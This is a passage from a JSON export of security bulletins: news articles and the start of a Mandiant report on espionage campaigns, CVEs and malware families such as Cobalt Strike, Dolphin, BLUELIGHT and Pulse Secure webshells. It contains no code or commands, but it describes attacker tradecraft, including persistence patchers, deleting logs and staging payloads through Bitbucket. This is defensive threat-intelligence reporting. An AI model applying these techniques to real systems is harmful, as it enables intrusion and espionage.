[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>), a remote code execution issue in Microsoft Office that allows an attacker to take control of an affected system.\n\nThe entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. government and Public Service Association, a trade union based in New Zealand.\n\nCobalt Strike beacons are far from the only malware samples deployed, as Cisco Talos said it has also observed the usage of the [Redline Stealer](<https://thehackernews.com/2022/09/researchers-warn-of-self-spreading.html>) and [Amadey botnet](<https://thehackernews.com/2022/07/smokeloader-infecting-targeted-systems.html>) executables as payloads at the other end of the attack chain.\n\nCalling the attack methodology \"highly modularized,\" the cybersecurity company said the activity also stands out for its use of Bitbucket repositories to host malicious content that serves as a starting point for downloading a Windows executable responsible for deploying the Cobalt Strike DLL beacon.\n\nIn an alternative attack sequence, the Bitbucket repository functions as a conduit to deliver obfuscated VB and PowerShell downloader scripts to install the beacon hosted on a different Bitbucket account.\n\n\"This campaign is a typical example of a threat actor using the technique of generating and executing 
malicious scripts in the victim's system memory,\" the researchers said.\n\n\"Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-30T10:20:00", "type": "thn", "title": "New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2022-10-01T05:49:12", "id": "THN:D18D5B68E1C8C3E3C323D4C71C3B2375", "href": "https://thehackernews.com/2022/09/new-malware-campaign-targeting-job.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:59", "description": 
"Microsoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for the Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. The vulnerabilities that are being actively exploited are listed below:\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * 
[**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. 
The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including:\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis 
[credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": 
"https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:39", "description": "Google's Project Zero team has made public details of an improperly patched zero-day security vulnerability in the Windows print spooler API that could be leveraged by a bad actor to execute arbitrary code.\n\nDetails of the unpatched flaw were revealed publicly after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOriginally tracked as [CVE-2020-0986](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0986.html>), the flaw concerns an elevation of privilege exploit in the GDI Print / [Print Spooler](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-printing>) API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019.\n\nBut with no patch in sight for about six months, ZDI ended up posting a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) as a zero-day on May 19 earlier this year, after which it was [exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in the wild in a campaign dubbed \"[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>)\" against an unnamed South Korean company.\n\n\"splwow64.exe\" is a Windows core system binary that allows 32-bit applications to connect with the 64-bit printer spooler service on 64-bit Windows systems. 
It implements a Local Procedure Call ([LPC](<https://en.wikipedia.org/wiki/Local_Inter-Process_Communication>)) server that can be used by other processes to access printing functions.\n\nSuccessful exploitation of this vulnerability could result in an attacker manipulating the memory of the \"splwow64.exe\" process to achieve execution of arbitrary code in kernel mode, ultimately using it to install malicious programs; view, change, or delete data; or create new accounts with full user rights.\n\nHowever, to achieve this, the adversary would first have to log on to the target system in question.\n\nAlthough Microsoft eventually [addressed](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) the shortcoming as part of its June Patch Tuesday update, new findings from Google's security team reveal that the flaw has not been fully remediated.\n\n\"The vulnerability still exists, just the exploitation method had to change,\" Google Project Zero researcher Maddie Stone [said](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) in a write-up.\n\n\"The original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy,\" Stone [detailed](<https://twitter.com/maddiestone/status/1341781305126612995>). 
\"The 'fix' simply changed the pointers to offsets, which still allows control of the args to the memcpy.\"\n\nThe newly reported elevation of privilege flaw, identified as CVE-2020-17008, is expected to be resolved by Microsoft on January 12, 2021, due to \"issues identified in testing\" after promising an initial fix in November.\n\nStone has also shared proof-of-concept (PoC) exploit code for CVE-2020-17008, based off of a PoC released by Kaspersky for CVE-2020-0986.\n\n\"There have been too many occurrences this year of zero-days known to be actively exploited being fixed incorrectly or incompletely,\" Stone [said](<https://twitter.com/maddiestone/status/1341781305126612995>). \"When [in the wild] zero-days aren't fixed completely, attackers can reuse their knowledge of vulnerabilities and exploit methods to easily develop new zero-days.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-24T09:01:00", "type": "thn", "title": "Google Discloses Poorly-Patched, Now Unpatched, Windows 0-Day Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-28T06:17:30", "id": "THN:279CDD851D8F33C8B07217F8D20F6AAA", "href": "https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-01T10:08:46", "description": "A previously undocumented backdoor called **Dolphin** has been attributed to the North Korea-linked **ScarCruft** group, which has used it against targets located in its southern counterpart.\n\n\"The backdoor [...] 
has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers,\" ESET researcher Filip Jur\u010dacko [said](<https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/>) in a new report published today.\n\nDolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control.\n\nThe Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper.\n\nThe campaign, first uncovered by [Kaspersky](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [Volexity](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) last year, [entailed](<https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html>) the weaponization of two Internet Explorer flaws ([CVE-2020-1380](<https://nvd.nist.gov/vuln/detail/CVE-2020-1380>) and [CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>)) to drop a backdoor named BLUELIGHT.\n\nScarCruft, also called APT37, InkySquid, Reaper, and Ricochet Chollima, is a geopolitically motivated APT group that has a track record of attacking government entities, diplomats, and news organizations associated with North Korean affairs. 
It's been known to be active since at least 2012.\n\nEarlier this April, cybersecurity firm Stairwell [disclosed](<https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html>) details of a spear-phishing attack targeting journalists covering the country with the ultimate goal of deploying malware dubbed GOLDBACKDOOR that shares tactical overlaps with BLUELIGHT.\n\nThe latest findings from ESET shed light on a second, more sophisticated backdoor delivered to a small pool of victims via BLUELIGHT, indicative of a highly-targeted espionage operation.\n\nThis, in turn, is achieved by executing an installer shellcode that activates a loader comprising a Python and shellcode component, the latter of which runs another shellcode loader to drop the backdoor.\n\n\"While the BLUELIGHT backdoor performs basic reconnaissance and evaluation of the compromised machine after exploitation, Dolphin is more sophisticated and manually deployed only against selected victims,\" Jur\u010dacko explained.\n\nWhat makes Dolphin a lot more potent than BLUELIGHT is its ability to search removable devices and connected smartphones, and exfiltrate files of interest, such as media, documents, emails, and certificates.\n\nThe backdoor, since its original discovery in April 2021, is said to have undergone three successive iterations, each with its own set of feature improvements and additional detection evasion capabilities.\n\n\"Dolphin is another addition to ScarCruft's extensive arsenal of backdoors abusing cloud storage services,\" Jur\u010dacko said. 
\"One unusual capability found in prior versions of the backdoor is the ability to modify the settings of victims' Google and Gmail accounts to lower their security, presumably in order to maintain account access for the threat actors.\"\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-30T18:30:00", "type": "thn", "title": "North Korea Hackers Using New \"Dolphin\" Backdoor to Spy on South Korean Targets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2022-12-01T09:22:08", "id": "THN:27562A9FDA5CEBF33FAC792C73F4B06E", "href": "https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:13", "description": 
"A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.\n\nCybersecurity firm Volexity [attributed](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) the watering hole attacks to a threat actor it tracks as InkySquid, more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.\n\nThe \"clever disguise of exploit code amongst legitimate code\" and the use of custom malware enable the attackers to avoid detection, Volexity researchers said.\n\nThe attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in [August 2020](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) and [March 2021](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>). Successful exploitation resulted in the deployment of a Cobalt Strike stager and a novel backdoor called BLUELIGHT. 
\n\n * [CVE-2020-1380](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-1380>) (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability\n * [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability\n\nIt's worth noting that both flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.\n\nIn a [separate set of attacks](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.\n\nBLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.\n\nIn addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.\n\n\"While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,\" the researchers noted. \"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.\"\n", 
"cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-18T08:33:00", "type": "thn", "title": "NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-08-18T14:51:37", "id": "THN:FA6A50184463DFCD20073D5EDD0F36F2", "href": "https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:35", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, is an elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. 
The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows Server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and that has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2021-10-29T03:23:15", "description": "On April 20, 2021, Mandiant published detailed results of our investigations into compromised Pulse Secure devices by suspected Chinese espionage operators. This blog post is intended to provide an update on our findings, give additional recommendations to network defenders, and discuss potential implications for U.S.-China strategic relations.\n\n * Mandiant continues to gather evidence and respond to intrusions involving compromises of Pulse Secure VPN appliances at organizations across the defense, government, high tech, transportation, and financial sectors in the U.S. and Europe (Figure 1).\n * Reverse engineers on the FLARE team have identified four additional code families specifically designed to manipulate Pulse Secure devices. \n * We now assess that espionage activity by UNC2630 and UNC2717 supports key Chinese government priorities. 
Many compromised organizations operate in verticals and industries aligned with Beijing\u2019s strategic objectives outlined in China\u2019s recent 14th Five Year Plan.\n * While there is evidence of data theft at many organizations, we have not directly observed the staging or exfiltration of any data by Chinese espionage actors that could be considered a violation of the Obama-Xi [agreement](<https://obamawhitehouse.archives.gov/the-press-office/2015/09/25/fact-sheet-president-xi-jinpings-state-visit-united-states>).\n * Mandiant Threat Intelligence assesses that Chinese cyber espionage activity has demonstrated a higher tolerance for risk and is less constrained by diplomatic pressures than previously characterized.\nFigure 1: Organizations with compromised Pulse Secure devices by vertical and geographic location\n\nPulse Secure continues to work closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues. Pulse Secure\u2019s parent company, Ivanti, has released patches to proactively address software vulnerabilities and issued updated [Security Advisories](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) and [Knowledge Articles](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to assist customers. (Please see the Forensics, Remediation, and Hardening Guidelines section for additional details.)\n\n#### UNC2630 and UNC2717 Tradecraft and Response to Disclosure\n\nMandiant is tracking 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyber espionage groups which we believe are affiliated with the Chinese government. 
Between April 17 and April 20, 2021, Mandiant incident responders observed UNC2630 access dozens of compromised devices and remove webshells like ATRIUM and SLIGHTPULSE.\n\n * Under certain conditions, the Integrity Checker Tool (ICT) will show no evidence of compromise on appliances which may have had historical compromise. This false negative may be returned because the ICT cannot scan the rollback partition. If a backdoor or persistence patcher exists on the rollback partition and a Pulse Secure appliance is rolled back to the prior version, the backdoor(s) will be present on the appliance. Please see the Forensics, Remediation, and Hardening Guidelines section for important information regarding the ICT and upgrade process.\n * In at least one instance, UNC2630 deleted their webshell(s) but did not remove the persistence patcher, making it possible to regain access when the device was upgraded. The remaining persistence patcher causes the malicious code to be executed later during a system upgrade, re-inserts webshell logic into various files on the appliance, and recompromises the device.\n * It is unusual for Chinese espionage actors to remove a large number of backdoors across several victim environments on or around the time of public disclosure. This action displays an interesting concern for operational security and a sensitivity to publicity.\n\nBoth UNC2630 and UNC2717 display advanced tradecraft and go to impressive lengths to avoid detection. The actors modify file timestamps and regularly edit or delete forensic evidence such as logs, web server core dumps, and files staged for exfiltration. They also demonstrate a deep understanding of network appliances and advanced knowledge of a targeted network. 
This tradecraft can make it difficult for network defenders to establish a complete list of tools used, credentials stolen, the initial intrusion vector, or the intrusion start date.\n\n#### Updates from Incident Response Investigations\n\nWe continue to suspect that multiple groups including UNC2630 and UNC2717 are responsible for this activity, despite the use of similar exploits and tools. There is a high degree of variation in attacker actions within victim environments, with actors inconsistently using a combination of tools and command and control IP addresses.\n\nReverse engineers on the FLARE team have identified four additional malware families specifically designed to manipulate Pulse Secure devices (Table 1). These utilities have similar functions to the 12 previously documented malware families: harvesting credentials and sensitive system data, allowing arbitrary file execution, and removing forensic evidence. Please see the Technical Annex for detailed analysis of these code families.\n\n**Malware Family** | **Description** | **Actor**\n---|---|---\nBLOODMINE | BLOODMINE is a utility for parsing Pulse Secure Connect log files. It extracts information related to logins, Message IDs and Web Requests and copies the relevant data to another file. | UNC2630\nBLOODBANK | BLOODBANK is a credential theft utility that parses two files containing password hashes or plaintext passwords and expects an output file to be given at the command prompt. | UNC2630\nCLEANPULSE | CLEANPULSE is a memory patching utility that may be used to prevent certain log events from occurring. It was found in close proximity to an ATRIUM webshell. | UNC2630\nRAPIDPULSE | RAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file. RAPIDPULSE can serve as an encrypted file downloader for the attacker. | UNC2630\n\nTable 1: New malware families identified\n\n_Initial Compromise_\n\nThe actors leveraged several vulnerabilities in Pulse Secure VPN appliances. Mandiant observed the use of the recently patched vulnerability CVE-2021-22893 to compromise fully patched Pulse Secure appliances, as well as previously disclosed vulnerabilities from 2019 and 2020. In many cases it was not possible to determine the initial exploitation vector and timeframe because the actors altered or deleted forensic evidence, or the appliance had undergone subsequent code upgrades, thereby destroying evidence related to the initial exploitation.\n\n_Establish Foothold_\n\nIn some cases, Mandiant observed the actors create their own Local Administrator account outside of established credential management controls on Windows servers of strategic value. This allowed the actor to maintain access to systems with short-cycle credential rotation policies and provided a sufficient 